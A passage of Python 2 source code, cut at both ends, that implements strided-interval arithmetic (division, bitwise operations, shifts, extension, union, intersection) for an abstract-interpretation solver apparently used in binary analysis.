0\n        divisor_lb = b.lower_bound\n        divisor_ub = b.upper_bound\n        if divisor_lb == 0:\n            # Try to increment it\n            if divisor_ub == 0:\n                return StridedInterval.empty(bits)\n            else:\n                divisor_lb = 1\n\n        dividend_positive = StridedInterval._is_msb_zero(a.lower_bound, bits)\n        divisor_positive = StridedInterval._is_msb_zero(b.lower_bound, bits)\n\n        # TODO: Can we make a more precise estimate of the stride?\n        stride = 1\n        if dividend_positive and divisor_positive:\n            # Both operands are positive!\n            lb = a.lower_bound / divisor_ub\n            ub = a.upper_bound / divisor_lb\n\n        elif dividend_positive and not divisor_positive:\n            # + / 
-\n            lb = a.upper_bound / StridedInterval._unsigned_to_signed(divisor_ub, bits)\n            ub = a.lower_bound / StridedInterval._unsigned_to_signed(divisor_lb, bits)\n\n        elif not dividend_positive and divisor_positive:\n            # - / +\n            lb = StridedInterval._unsigned_to_signed(a.lower_bound, bits) / divisor_lb\n            ub = StridedInterval._unsigned_to_signed(a.upper_bound, bits) / divisor_ub\n\n        else:\n            # - / -\n            lb = StridedInterval._unsigned_to_signed(a.upper_bound, bits) / \\\n                 StridedInterval._unsigned_to_signed(b.lower_bound, bits)\n            ub = StridedInterval._unsigned_to_signed(a.lower_bound, bits) / \\\n                 StridedInterval._unsigned_to_signed(b.upper_bound, bits)\n\n        return StridedInterval(bits=bits, stride=stride, lower_bound=lb, upper_bound=ub)\n\n    @staticmethod\n    def _wrapped_bitwise_or(a, b):\n        if a.is_empty or b.is_empty:\n            logger.error('Bitwise_or on empty strided-intervals.')\n            return a.copy()\n\n        # Special handling for integers\n        # TODO: Is this special handling still necessary?\n        if a.is_integer:\n            # a is an integer\n            t = StridedInterval._ntz(b.stride)\n        elif b.is_integer:\n            # b is an integer\n            t = StridedInterval._ntz(a.stride)\n        else:\n            t = min(StridedInterval._ntz(a.stride), StridedInterval._ntz(b.stride))\n\n        # If a or b is zero, we can make the stride more precise!\n        premask = 1 << t\n        if a.is_integer and a.lower_bound == 0:\n            # a is 0\n            # OR'ing with zero does not change the stride\n            stride_ = b.stride\n        elif b.is_integer and b.lower_bound == 0:\n            # b is 0\n            stride_ = a.stride\n        else:\n            stride_ = 1 << t\n        lowbits = (a.lower_bound | b.lower_bound) & (premask - 1)\n\n        # TODO: Make this function look better\n        r_1 = a.lower_bound < 0\n        r_2 = a.upper_bound < 0\n        r_3 = b.lower_bound < 0\n        r_4 = b.upper_bound < 0\n\n        if (r_1, r_2, r_3, r_4) in ((True, True, True, True), (True, True, False, False), (False, False, True, True), (False, False, False, False)):\n            # The sign of each operand is fixed, so min_or/max_or apply to the bounds directly\n            lb_ = StridedInterval.min_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, b.upper_bound)\n            ub_ = StridedInterval.max_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, b.upper_bound)\n        elif (r_1, r_2, r_3, r_4) == (True, True, True, False):\n            lb_ = a.lower_bound\n            ub_ = 1\n        elif (r_1, r_2, r_3, r_4) == (True, False, True, True):\n            lb_ = b.lower_bound\n            ub_ = 1\n        elif (r_1, r_2, r_3, r_4) == (True, False, True, False):\n            lb_ = min(a.lower_bound, b.lower_bound)\n            ub_ = StridedInterval.max_or(a.bits, 0, a.upper_bound, 0, b.upper_bound)\n        elif (r_1, r_2, r_3, r_4) == (True, False, False, False):\n            lb_ = StridedInterval.min_or(a.bits, a.lower_bound, 1, b.lower_bound, b.upper_bound)\n            ub_ = StridedInterval.max_or(a.bits, 0, a.upper_bound, b.lower_bound, b.upper_bound)\n        elif (r_1, r_2, r_3, r_4) == (False, False, True, False):\n            lb_ = StridedInterval.min_or(a.bits, a.lower_bound, a.upper_bound, b.lower_bound, 1)\n            ub_ = StridedInterval.max_or(a.bits, a.lower_bound, 
a.upper_bound, b.lower_bound, b.upper_bound)\n else:\n raise ArithmeticError(\"Impossible\")\n\n highmask = ~(premask - 1)\n ret = StridedInterval(bits=a.bits, stride=stride_, lower_bound=(lb_ & highmask) | lowbits,\n upper_bound=(ub_ & highmask) | lowbits)\n ret.normalize()\n\n return ret\n\n @staticmethod\n def _wrapped_bitwise_and(a, b):\n def number_of_ones(n):\n ctr = 0\n while n > 0:\n ctr += 1\n n &= n - 1\n\n return ctr\n\n # If only one bit is set in b, we can make it more precise\n if b.is_integer:\n if b.lower_bound == (1 << (b.bits - 1)):\n # It's testing the sign bit\n stride = 1 << (b.bits - 1)\n if a.lower_bound < 0:\n if a.upper_bound >= 0:\n return StridedInterval(bits=b.bits, stride=stride, lower_bound=0, upper_bound=stride)\n else:\n return StridedInterval(bits=b.bits, stride=0, lower_bound=stride, upper_bound=stride)\n else:\n if a.lower_bound >= stride and a.upper_bound >= stride:\n return StridedInterval(bits=b.bits, stride=0, lower_bound=stride, upper_bound=stride)\n elif a.lower_bound < stride and a.upper_bound >= stride:\n return StridedInterval(bits=b.bits, stride=stride, lower_bound=0, upper_bound=stride)\n else:\n return StridedInterval(bits=b.bits, stride=0, lower_bound=0, upper_bound=0)\n\n elif number_of_ones(b.lower_bound) == 1:\n if a.lower_bound < 0 and a.upper_bound > 0:\n mask = (2 ** a.bits) - 1\n s = a.copy()\n s.lower_bound = a.lower_bound & mask\n if s.lower_bound > s.upper_bound:\n t = s.upper_bound\n s.upper_bound = s.lower_bound\n s.lower_bound = t\n\n else:\n s = a\n\n first_one_pos = StridedInterval._ntz(b.lower_bound)\n\n stride = 2 ** first_one_pos\n if s.lower_bound <= stride and s.upper_bound >= stride:\n return StridedInterval(bits=s.bits, stride=stride, lower_bound=0, upper_bound=stride)\n elif s.upper_bound < stride:\n return StridedInterval(bits=s.bits, stride=0, lower_bound=0, upper_bound=0)\n else:\n return StridedInterval(bits=s.bits, stride=0, lower_bound=stride, upper_bound=stride)\n\n return a.bitwise_not().bitwise_or(b.bitwise_not()).bitwise_not()\n\n #\n # Membership testing and poset ordering\n #\n\n @staticmethod\n def _lex_lte(x, y, bits):\n \"\"\"\n Lexicographical LTE comparison\n\n :param x: The first operand (integer)\n :param y: The second operand (integer)\n :param bits: bit-width of the operands\n :return: True or False\n \"\"\"\n\n return (x & (2 ** bits - 1)) <= (y & (2 ** bits - 1))\n\n @staticmethod\n def _lex_lt(x, y, bits):\n \"\"\"\n Lexicographical LT comparison\n\n :param x: The first operand (integer)\n :param y: The second operand (integer)\n :param bits: bit-width of the operands\n :return: True or False\n \"\"\"\n\n return (x & (2 ** bits - 1)) < (y & (2 ** bits - 1))\n\n def _wrapped_member(self, v):\n \"\"\"\n Test if integer v belongs to StridedInterval a\n\n :param self: A StridedInterval instance\n :param v: An integer\n :return: True or False\n \"\"\"\n\n a = self\n return self._lex_lte(v - a.lower_bound, a.upper_bound - a.lower_bound, a.bits)\n\n def _wrapped_lte(self, b):\n \"\"\"\n Perform a wrapped LTE comparison based on the poset ordering\n\n :param a: The first operand\n :param b: The second operand\n :return: True if a <= b, False otherwise\n \"\"\"\n\n a = self\n if a.is_empty:\n return True\n\n if a.is_top and b.is_top:\n return True\n\n elif a.is_top:\n return False\n\n elif b.is_top:\n return True\n\n if b._wrapped_member(a.lower_bound) and b._wrapped_member(a.upper_bound):\n if ((b.lower_bound == a.lower_bound and b.upper_bound == a.upper_bound)\n or not a._wrapped_member(b.lower_bound) 
or not a._wrapped_member(b.upper_bound)):\n return True\n return False\n\n #\n # Arithmetic operations\n #\n\n @reversed_processor\n def neg(self):\n \"\"\"\n Unary operation: neg\n\n :return: 0 - self\n \"\"\"\n\n return StridedInterval(bits=self.bits, stride=0, lower_bound=0, upper_bound=0).sub(self)\n\n @normalize_types\n def add(self, b):\n \"\"\"\n Binary operation: add\n\n :param b: The other operand\n :return: self + b\n \"\"\"\n new_bits = max(self.bits, b.bits)\n\n # TODO: Some improvements can be made here regarding the following case\n # TODO: SI<16>0xff[0x0, 0xff] + 3\n # TODO: In current implementation, it overflows, but it doesn't have to\n\n overflow = self._wrappedoverflow_add(self, b)\n if overflow:\n return StridedInterval.top(self.bits)\n\n lb = self._modular_add(self.lower_bound, b.lower_bound, new_bits)\n ub = self._modular_add(self.upper_bound, b.upper_bound, new_bits)\n\n # Is it initialized?\n uninitialized = self.uninitialized or b.uninitialized\n\n # Take the GCD of two operands' strides\n stride = fractions.gcd(self.stride, b.stride)\n\n return StridedInterval(bits=new_bits, stride=stride, lower_bound=lb, upper_bound=ub,\n uninitialized=uninitialized)\n\n @normalize_types\n def sub(self, b):\n \"\"\"\n Binary operation: sub\n\n :param b: The other operand\n :return: self - b\n \"\"\"\n\n new_bits = max(self.bits, b.bits)\n\n overflow = self._wrappedoverflow_sub(self, b)\n if overflow:\n return StridedInterval.top(self.bits)\n\n lb = self._modular_sub(self.lower_bound, b.upper_bound, new_bits)\n ub = self._modular_sub(self.upper_bound, b.lower_bound, new_bits)\n\n # Is it initialized?\n uninitialized = self.uninitialized or b.uninitialized\n\n # Take the GCD of two operands' strides\n stride = fractions.gcd(self.stride, b.stride)\n\n return StridedInterval(bits=new_bits, stride=stride, lower_bound=lb, upper_bound=ub,\n uninitialized=uninitialized)\n @normalize_types\n def mul(self, o):\n \"\"\"\n Binary operation: multiplication\n\n :param o: The other operand\n :return: self * o\n \"\"\"\n\n if self.is_integer and o.is_integer:\n # Two integers!\n a, b = self.lower_bound, o.lower_bound\n ret = StridedInterval(bits=self.bits,\n stride=0,\n lower_bound=a * b,\n upper_bound=a * b\n )\n\n return ret.normalize()\n\n else:\n # All other cases\n\n # Cut from both north pole and south pole\n si1_psplit = self._psplit()\n si2_psplit = o._psplit()\n\n ret = None\n for si1 in si1_psplit:\n for si2 in si2_psplit:\n tmp_unsigned_mul = self._wrapped_unsigned_mul(si1, si2)\n tmp_signed_mul = self._wrapped_signed_mul(si1, si2)\n\n tmp_meet = tmp_unsigned_mul.intersection(tmp_signed_mul)\n\n if ret is None:\n ret = tmp_meet\n else:\n ret = ret.union(tmp_meet)\n\n return ret.normalize()\n\n def sdiv(self, o):\n \"\"\"\n Binary operation: signed division\n\n :param o: The divisor\n :return: (self / o) in signed arithmetic\n \"\"\"\n\n splitted_dividends = self._nsplit()\n splitted_divisors = o._nsplit()\n\n ret = self.empty(self.bits)\n for dividend in splitted_dividends:\n for divisor in splitted_divisors:\n tmp = self._wrapped_signed_div(dividend, divisor)\n ret = ret.union(tmp)\n\n return ret.normalize()\n\n def udiv(self, o):\n \"\"\"\n Binary operation: unsigned division\n\n :param o: The divisor\n :return: (self / o) in unsigned arithmetic\n \"\"\"\n\n splitted_dividends = self._ssplit()\n splitted_divisors = o._ssplit()\n\n ret = self.empty(self.bits)\n for dividend in splitted_dividends:\n for divisor in splitted_divisors:\n tmp = self._wrapped_unsigned_div(dividend, 
divisor)\n                ret = ret.union(tmp)\n\n        return ret.normalize()\n\n    @reversed_processor\n    def bitwise_not(self):\n        \"\"\"\n        Unary operation: bitwise not\n\n        :return: ~self\n        \"\"\"\n        splitted_si = self._ssplit()\n\n        ret = StridedInterval.empty(self.bits)\n\n        for si in splitted_si:\n            lb = ~si.upper_bound\n            ub = ~si.lower_bound\n            stride = self.stride\n\n            tmp = StridedInterval(bits=self.bits, stride=stride, lower_bound=lb, upper_bound=ub)\n            ret = ret.union(tmp)\n\n        return ret\n\n    @staticmethod\n    def min_or(k, a, b, c, d):\n        m = StridedInterval.highbit(k)\n        ret = 0\n        while True:\n            if m == 0:\n                ret = a | c\n                break\n            elif (~a & c & m) != 0:\n                tmp = (a | m) & -m\n                if tmp <= b:\n                    ret = tmp | c\n                    break\n            elif (a & ~c & m) != 0:\n                tmp = (c | m) & -m\n                if tmp <= d:\n                    ret = tmp | a\n                    break\n            m = m >> 1\n\n        return ret\n\n    @staticmethod\n    def max_or(k, a, b, c, d):\n        m = StridedInterval.highbit(k)\n        while True:\n            if m == 0:\n                return b | d\n            elif (b & d & m) != 0:\n                tmp1 = (b - m) | (m - 1)\n                tmp2 = (d - m) | (m - 1)\n                if tmp1 >= a:\n                    return tmp1 | d\n                elif tmp2 >= c:\n                    return tmp2 | b\n            m = m >> 1\n\n    @normalize_types\n    def bitwise_or(self, b):\n        \"\"\"\n        Binary operation: bitwise or\n        :param b: The other operand\n        :return: self | b\n        \"\"\"\n\n        splitted_a = self._ssplit()\n        splitted_b = b._ssplit()\n\n        ret = StridedInterval.empty(self.bits)\n        for x in splitted_a:\n            for y in splitted_b:\n                tmp = self._wrapped_bitwise_or(x, y)\n                ret = ret.union(tmp)\n\n        return ret.normalize()\n\n    @normalize_types\n    def bitwise_and(self, b):\n        \"\"\"\n        Binary operation: bitwise and\n        :param b: The other operand\n        :return: self & b\n        \"\"\"\n\n        splitted_a = self._ssplit()\n        splitted_b = b._ssplit()\n\n        ret = StridedInterval.empty(self.bits)\n        for x in splitted_a:\n            for y in splitted_b:\n                tmp = self._wrapped_bitwise_and(x, y)\n                ret = ret.union(tmp)\n\n        return ret.normalize()\n\n    @normalize_types\n    def bitwise_xor(self, b):\n        '''\n        Binary operation: bitwise xor\n        :param b: The other operand\n        :return: self ^ b\n        '''\n        return self.bitwise_not().bitwise_or(b).bitwise_not().bitwise_or(b.bitwise_not().bitwise_or(self).bitwise_not())\n\n    def _pre_shift(self, shift_amount):\n        def get_range(expr):\n            '''\n            Get the range of bits for shifting\n            :param expr:\n            :return: A tuple of minimum and maximum bits to shift\n            '''\n            def round(max, x): #pylint:disable=redefined-builtin\n                if x < 0 or x > max:\n                    return max\n                else:\n                    return x\n\n            if type(expr) in [int, long]:\n                return (expr, expr)\n\n            assert type(expr) is StridedInterval\n\n            if expr.is_integer:\n                return (round(self.bits, expr.lower_bound),\n                        round(self.bits, expr.lower_bound))\n            else:\n                if expr.lower_bound < 0:\n                    if expr.upper_bound >= 0:\n                        return (0, self.bits)\n                    else:\n                        return (self.bits, self.bits)\n                else:\n                    return (round(self.bits, expr.lower_bound), round(self.bits, expr.upper_bound))\n\n        lower, upper = get_range(shift_amount)\n        # TODO: Is truncating necessary?\n\n        return lower, upper\n\n    @reversed_processor\n    def rshift(self, shift_amount):\n        lower, upper = self._pre_shift(shift_amount)\n\n        # Shift the lower_bound and upper_bound by all possible amounts, and\n        # get min/max values from all the resulting values\n\n        new_lower_bound = None\n        new_upper_bound = None\n        for shift_amount in xrange(lower, upper + 1):\n            l = self.lower_bound >> shift_amount\n            if new_lower_bound is None or l < new_lower_bound:\n                new_lower_bound = l\n            u = self.upper_bound >> shift_amount\n            if new_upper_bound is None or u > new_upper_bound:\n                new_upper_bound = u\n\n        # NOTE: If this is an arithmetic operation, we should take care\n        # of 
sign-changes.\n\n        ret = StridedInterval(bits=self.bits,\n                              stride=max(self.stride >> upper, 1),\n                              lower_bound=new_lower_bound,\n                              upper_bound=new_upper_bound)\n        ret.normalize()\n\n        return ret\n\n    @reversed_processor\n    def lshift(self, shift_amount):\n        lower, upper = self._pre_shift(shift_amount)\n\n        # Shift the lower_bound and upper_bound by all possible amounts, and\n        # get min/max values from all the resulting values\n\n        new_lower_bound = None\n        new_upper_bound = None\n        for shift_amount in xrange(lower, upper + 1):\n            l = self.lower_bound << shift_amount\n            if new_lower_bound is None or l < new_lower_bound:\n                new_lower_bound = l\n            u = self.upper_bound << shift_amount\n            if new_upper_bound is None or u > new_upper_bound:\n                new_upper_bound = u\n\n        # NOTE: If this is an arithmetic operation, we should take care\n        # of sign-changes.\n\n        ret = StridedInterval(bits=self.bits,\n                              stride=max(self.stride << lower, 1),\n                              lower_bound=new_lower_bound,\n                              upper_bound=new_upper_bound)\n        ret.normalize()\n\n        return ret\n\n    @reversed_processor\n    def cast_low(self, tok):\n        assert tok <= self.bits\n\n        if tok == self.bits:\n            return self.copy()\n        else:\n            # Calculate the new upper bound and lower bound\n            mask = (1 << tok) - 1\n            if (self.lower_bound & mask) == self.lower_bound and \\\n                    (self.upper_bound & mask) == self.upper_bound:\n                return StridedInterval(bits=tok, stride=self.stride,\n                                       lower_bound=self.lower_bound,\n                                       upper_bound=self.upper_bound)\n\n            elif self.upper_bound - self.lower_bound <= mask:\n                l = self.lower_bound & mask\n                u = self.upper_bound & mask\n                # Keep the signs!\n                if self.lower_bound < 0:\n                    l = StridedInterval._to_negative(l, tok)\n                if self.upper_bound < 0:\n                    u = StridedInterval._to_negative(u, tok)\n                return StridedInterval(bits=tok, stride=self.stride,\n                                       lower_bound=l,\n                                       upper_bound=u)\n\n            elif (self.upper_bound & mask == self.lower_bound & mask) and \\\n                    ((self.upper_bound - self.lower_bound) & mask == 0):\n                # This operation doesn't affect the stride. Stride should be 0 then.\n\n                bound = self.lower_bound & mask\n\n                return StridedInterval(bits=tok,\n                                       stride=0,\n                                       lower_bound=bound,\n                                       upper_bound=bound)\n\n            else:\n                # TODO: How can we do better here? 
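Returning TOP here throws away all the value information we have. 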
For example, keep the stride information?\n return self.top(tok)\n\n @normalize_types\n def concat(self, b):\n\n # Zero-extend\n a = self.nameless_copy()\n a._bits += b.bits\n\n new_si = a.lshift(b.bits)\n new_b = b.copy()\n # Zero-extend b\n new_b._bits = new_si.bits\n\n if new_si.is_integer:\n # We can be more precise!\n new_si._bits = new_b.bits\n new_si._stride = new_b.stride\n new_si._lower_bound = new_si.lower_bound + b.lower_bound\n new_si._upper_bound = new_si.upper_bound + b.upper_bound\n return new_si\n else:\n return new_si.bitwise_or(new_b)\n\n @reversed_processor\n def extract(self, high_bit, low_bit):\n\n assert low_bit >= 0\n\n bits = high_bit - low_bit + 1\n\n if low_bit != 0:\n ret = self.rshift(low_bit)\n else:\n ret = self.copy()\n if bits != self.bits:\n ret = ret.cast_low(bits)\n\n return ret.normalize()\n\n @reversed_processor\n def sign_extend(self, new_length):\n \"\"\"\n Unary operation: SignExtend\n\n :param new_length: New length after sign-extension\n :return: A new StridedInterval\n \"\"\"\n\n msb = self.extract(self.bits - 1, self.bits - 1).eval(2)\n\n if msb == [ 0 ]:\n # All positive numbers\n return self.zero_extend(new_length)\n\n if msb == [ 1 ]:\n # All negative numbers\n\n si = self.copy()\n si._bits = new_length\n\n mask = (2 ** new_length - 1) - (2 ** self.bits - 1)\n si._lower_bound = si._lower_bound | mask\n si._upper_bound = si._upper_bound | mask\n\n else:\n # Both positive numbers and negative numbers\n numbers = self._nsplit()\n\n # Since there are both positive and negative numbers, there must be two bounds after nsplit\n # assert len(numbers) == 2\n\n si = self.empty(new_length)\n\n for n in numbers:\n a, b = n.lower_bound, n.upper_bound\n\n if b < 2 ** (n.bits - 1):\n # msb = 0\n\n si_ = StridedInterval(bits=new_length, stride=n.stride, lower_bound=a, upper_bound=b)\n\n else:\n # msb = 1\n\n mask = (2 ** new_length - 1) - (2 ** self.bits - 1)\n\n si_ = StridedInterval(bits=new_length, stride=n.stride, lower_bound=a | mask, upper_bound=b | mask)\n\n si = si.union(si_)\n\n return si\n\n @reversed_processor\n def zero_extend(self, new_length):\n \"\"\"\n Unary operation: ZeroExtend\n\n :param new_length: New length after zero-extension\n :return: A new StridedInterval\n \"\"\"\n\n si = self.copy()\n si._bits = new_length\n\n return si\n\n @normalize_types\n def union(self, b):\n \"\"\"\n The union operation. 
It might return a DiscreteStridedIntervalSet to allow for better precision in analysis.\n\n        :param b: Operand\n        :return: A new DiscreteStridedIntervalSet, or a new StridedInterval.\n        \"\"\"\n        if not allow_dsis:\n            return self._union(b)\n\n        else:\n            if self.cardinality > discrete_strided_interval_set.MAX_CARDINALITY_WITHOUT_COLLAPSING or \\\n                    b.cardinality > discrete_strided_interval_set.MAX_CARDINALITY_WITHOUT_COLLAPSING:\n                return self._union(b)\n\n            else:\n                dsis = DiscreteStridedIntervalSet(bits=self._bits, si_set={ self })\n                return dsis.union(b)\n\n    @normalize_types\n    def _union(self, b):\n        \"\"\"\n        Binary operation: union\n        It's also the join operation.\n\n        :param b: The other operand.\n        :return: A new StridedInterval\n        \"\"\"\n        if self._reversed != b._reversed:\n            logger.warning('Incoherent reversed flag between operands %s and %s', self, b)\n\n        #\n        # Trivial cases\n        #\n\n        if self.is_empty:\n            return b\n        if b.is_empty:\n            return self\n\n        if self.is_integer and b.is_integer:\n            u = max(self.upper_bound, b.upper_bound)\n            l = min(self.lower_bound, b.lower_bound)\n            stride = abs(u - l)\n            return StridedInterval(bits=self.bits, stride=stride, lower_bound=l, upper_bound=u)\n\n        #\n        # Other cases\n        #\n\n        # Determine the new stride\n        if self.is_integer:\n            new_stride = fractions.gcd(self._modular_sub(self.lower_bound, b.lower_bound, self.bits), b.stride)\n        elif b.is_integer:\n            new_stride = fractions.gcd(self.stride, self._modular_sub(b.lower_bound, self.lower_bound, self.bits))\n        else:\n            new_stride = fractions.gcd(self.stride, b.stride)\n\n        remainder_1 = self.lower_bound % new_stride if new_stride > 0 else 0\n        remainder_2 = b.lower_bound % new_stride if new_stride > 0 else 0\n        if remainder_1 != remainder_2:\n            new_stride = fractions.gcd(abs(remainder_1 - remainder_2), new_stride)\n\n        # Then we have different cases\n\n        if self._wrapped_lte(b):\n            # Containment\n\n            return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=b.lower_bound,\n                                   upper_bound=b.upper_bound)\n\n        elif b._wrapped_lte(self):\n            # Containment\n\n            # TODO: This case is missing in the original implementation. 
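(It mirrors the self._wrapped_lte(b) branch above with the operands swapped, so returning self's bounds appears consistent.) 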
Is that a bug?\n            return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=self.lower_bound,\n                                   upper_bound=self.upper_bound)\n\n        elif (self._wrapped_member(b.lower_bound) and self._wrapped_member(b.upper_bound) and\n                b._wrapped_member(self.lower_bound) and b._wrapped_member(self.upper_bound)):\n            # Together the two operands cover the entire number circle\n\n            return StridedInterval.top(self.bits)\n\n        elif self._wrapped_member(b.lower_bound):\n            # Overlapping\n\n            return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=self.lower_bound,\n                                   upper_bound=b.upper_bound)\n\n        elif b._wrapped_member(self.lower_bound):\n            # Overlapping\n\n            return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=b.lower_bound,\n                                   upper_bound=self.upper_bound)\n\n        else:\n            card_1 = self._wrapped_cardinality(self.upper_bound, b.lower_bound, self.bits)\n            card_2 = self._wrapped_cardinality(b.upper_bound, self.lower_bound, self.bits)\n\n            if card_1 == card_2:\n                # Left/right leaning cases\n                if self._lex_lt(self.lower_bound, b.lower_bound, self.bits):\n                    return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=self.lower_bound,\n                                           upper_bound=b.upper_bound)\n\n                else:\n                    return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=b.lower_bound,\n                                           upper_bound=self.upper_bound)\n\n            elif card_1 < card_2:\n                # non-overlapping case (left)\n                return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=self.lower_bound,\n                                       upper_bound=b.upper_bound)\n\n            else:\n                # non-overlapping case (right)\n                return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=b.lower_bound,\n                                       upper_bound=self.upper_bound)\n\n    def _minimum_intersection_integer(self, other, lb_from_self):\n        \"\"\"\n        Solves for the minimum integer that exists in both StridedIntervals\n\n        :param other: The other operand\n        :param lb_from_self: True/False. If True, the lower bound of the intersection is expected to come from\n                             `self` (i.e. `other` contains `self` or at least `self`.lower_bound); if False,\n                             it is expected to come from `other`\n        :return: The minimum integer if there is one, or None if it doesn't exist.\n        \"\"\"\n\n        # TODO: lb_from_self is unused. 
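(Presumably it was meant to select which operand's lower bound seeds the search.) 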
Further understanding is needed to determine whether it can be removed or not.\n\n        # It's equivalent to finding an integral solution for equation `ax + b = cy + d` that makes `ax + b` minimal\n        # Some assumptions:\n        #   a, b, c, d are all positive integers\n        #   x >= 0, y >= 0\n\n        if self.lower_bound > self.upper_bound:\n            # straddling the south pole\n\n            A, B = self._ssplit()\n\n            int_0 = A._minimum_intersection_integer(other, lb_from_self)\n            int_1 = B._minimum_intersection_integer(other, lb_from_self)\n\n            # Note that int_1 has priority if both of them are not None, since int_1 is from the right side of the\n            # number ring, and is thereby less than int_0\n            return int_1 if int_1 is not None else int_0\n\n        else:\n            if other.lower_bound > other.upper_bound:\n                return other._minimum_intersection_integer(self, lb_from_self)\n\n            else:\n                return self._minimum_intersection_integer_splitted(other)\n\n    def _minimum_intersection_integer_splitted(self, other):\n        \"\"\"\n        Solves for the minimum integer that exists in both StridedIntervals\n\n        :param other: The other operand\n        :return: The minimum integer if there is one, or None if it doesn't exist.\n        \"\"\"\n\n        # It's equivalent to finding an integral solution for equation `ax + b = cy + d` that makes `ax + b` minimal\n        # Some assumptions:\n        #   a, b, c, d are all positive integers\n        #   x >= 0, y >= 0\n\n        # if any of them is an integer\n        if self.is_integer:\n            if other.is_integer:\n                return None if self.lower_bound != other.lower_bound else self.lower_bound\n            elif self.lower_bound >= other.lower_bound and \\\n                    self.lower_bound <= other.upper_bound and \\\n                    (self.lower_bound - other.lower_bound) % other.stride == 0:\n                return self.lower_bound\n            else:\n                return None\n        elif other.is_integer:\n            return other._minimum_intersection_integer_splitted(self)\n\n        # shortcut\n        if self.upper_bound < other.lower_bound or other.upper_bound < self.lower_bound:\n            # They don't overlap at all\n            return None\n\n        a, b, c, d = self.stride, self.lower_bound, other.stride, other.lower_bound\n\n        if (d - b) % self.gcd(a, c) != 0:\n            # They don't overlap\n            return None\n\n        if a < c:\n            mod = (d - b) % a\n            min_y_mod = a - mod if mod != 0 else 0\n            base_y = int((b - d) / c) if (b - d) % c == 0 else int((b - d) / c) + 1\n            base_y = 0 if base_y < 0 else base_y\n            min_y = min_y_mod + base_y\n            first_integer = c * min_y + d\n        else:\n            mod = (b - d) % c\n            min_x_mod = c - mod if mod != 0 else 0\n            base_x = int((d - b) / a) if (d - b) % a == 0 else int((d - b) / a) + 1\n            base_x = 0 if base_x < 0 else base_x\n            min_x = min_x_mod + base_x\n            first_integer = a * min_x + b\n\n        if self._wrapped_member(first_integer) and \\\n                self._modular_sub(first_integer, self.lower_bound, self.bits) % self.stride == 0 and \\\n                other._wrapped_member(first_integer) and \\\n                other._modular_sub(first_integer, other.lower_bound, other.bits) % other.stride == 0:\n            return first_integer\n        else:\n            return None\n\n    @normalize_types\n    def intersection(self, b):\n        \"\"\"\n        Binary operation: intersection (the meet operation)\n\n        :param b: The other operand\n        :return: A new StridedInterval\n        \"\"\"\n        if self.is_empty or b.is_empty:\n            return StridedInterval.empty(self.bits)\n\n        assert self.bits == b.bits\n\n        if self.is_integer and b.is_integer:\n            if self.lower_bound == b.lower_bound:\n                # They are the same number!\n                ret = StridedInterval(bits=self.bits,\n                                      stride=0,\n                                      lower_bound=self.lower_bound,\n                                      upper_bound=self.lower_bound)\n            else:\n                ret = StridedInterval.empty(self.bits)\n\n        elif self.is_integer:\n            integer = self.lower_bound\n            if (b.lower_bound - integer) % b.stride == 0 and \\\n                    b._wrapped_member(integer):\n                ret = StridedInterval(bits=self.bits,\n                                      stride=0,\n                                      lower_bound=integer,\n                                      
upper_bound=integer)\n            else:\n                ret = StridedInterval.empty(self.bits)\n\n        elif b.is_integer:\n            integer = b.lower_bound\n            if (integer - self.lower_bound) % self.stride == 0 and \\\n                    self._wrapped_member(integer):\n                ret = StridedInterval(bits=self.bits,\n                                      stride=0,\n                                      lower_bound=integer,\n                                      upper_bound=integer)\n            else:\n                ret = StridedInterval.empty(self.bits)\n\n        else:\n            # None of the operands is an integer\n\n            new_stride = self.lcm(self.stride, b.stride)\n\n            def _with_bounds(lb, ub_base):\n                # Build the intersection from the minimum common integer `lb` and the last value\n                # reachable from it (stepping by new_stride) without passing ub_base\n                if lb is None:\n                    return StridedInterval.empty(self.bits)\n                ub = self._modular_add(\n                    self._modular_sub(ub_base, lb, self.bits) / new_stride * new_stride,\n                    lb,\n                    self.bits\n                )\n                return StridedInterval(bits=self.bits,\n                                       stride=new_stride,\n                                       lower_bound=lb,\n                                       upper_bound=ub\n                                       )\n\n            if self._wrapped_lte(b):\n                # `b` may fully contain `self`\n                ret = _with_bounds(self._minimum_intersection_integer(b, True), self.upper_bound)\n\n            elif b._wrapped_lte(self):\n                # `self` contains `b`\n                ret = _with_bounds(b._minimum_intersection_integer(self, True), b.upper_bound)\n\n            elif self._wrapped_member(b.lower_bound) and \\\n                    self._wrapped_member(b.upper_bound) and \\\n                    b._wrapped_member(self.lower_bound) and \\\n                    b._wrapped_member(self.upper_bound):\n                # One covers the other\n\n                card_1 = self._wrapped_cardinality(self.lower_bound, self.upper_bound, self.bits)\n                card_2 = self._wrapped_cardinality(b.lower_bound, b.upper_bound, b.bits)\n                if self._lex_lt(card_1, card_2, self.bits) or \\\n                        (card_1 == card_2 and self._lex_lte(self.lower_bound, b.lower_bound, self.bits)):\n                    ret = _with_bounds(self._minimum_intersection_integer(b, True), self.upper_bound)\n                else:\n                    ret = _with_bounds(self._minimum_intersection_integer(b, False), b.upper_bound)\n\n            elif self._wrapped_member(b.lower_bound):\n                # Overlapping\n                ret = _with_bounds(b._minimum_intersection_integer(self, True), self.upper_bound)\n\n            elif b._wrapped_member(self.lower_bound):\n                # Overlapping\n                ret = _with_bounds(self._minimum_intersection_integer(b, True), b.upper_bound)\n\n            else:\n                # Disjoint\n                ret = StridedInterval.empty(self.bits)\n\n        ret.normalize()\n        return ret\n\n    @normalize_types\n    def widen(self, b):\n        ret = None\n\n        if self.is_empty and not b.is_empty:\n            ret = StridedInterval.top(bits=self.bits)\n\n        elif 
